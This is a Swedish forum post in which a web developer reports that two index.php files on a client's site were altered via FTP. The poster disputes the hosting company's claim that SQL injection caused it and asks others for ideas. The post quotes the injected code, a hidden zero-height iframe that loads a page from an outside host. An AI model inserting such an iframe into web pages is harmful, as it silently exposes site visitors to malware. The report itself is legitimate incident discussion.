[grinditwp]

I fredags klockan 20.39, redigerades två php filer enligt ftp-loggen på en kunds webbsida.
filerna är två filer som heter index.php.

Vad som förändrats är att följande kodbit slarvigt lagts till, ca 100 rader ner i dokumentet.

PHP-kod:

<iframe src="http://elena69747.ath.cx:8080/ts/in.cgi?open8" width=537 height=0 style="visibility: hidden"></iframe> 


Raderna som berörs har inte med SQL att göra, ingen data skickas eller hämtas från SQL. Det är med andra ord hårdkodat in i dokumentet och kan knappast röra sig om en SQL-Injektion.

Vad får jag för svar av FS-Data när jag lägger ett e-post om incidenten för att fråga om de vet något, eller i alla fall tipsa dem om att någon verkar hacka deras konton. Svaret jag får är att det antagligen bara är en SQL-Injektion och att vi troligen bör se över vår kod.

Personen i fråga verkar inte ens tagit sig tiden att kolla på filerna jag bifogade. Mig veterligen så bör en SQL-Injection inte kunna ändra hårdkodad kod filer. En SQL-Injektion, precis som namnet avslöjar kräver en databas inmatning. Något som ofta används när man försöker hacka ett loggin. Något som de flesta, någorlunda seriösa eller nya system inte bör kunna drabbas av.

Reflektioner? Någon som varit med om liknande? Någon som har en aning om vad det kan röra sig om?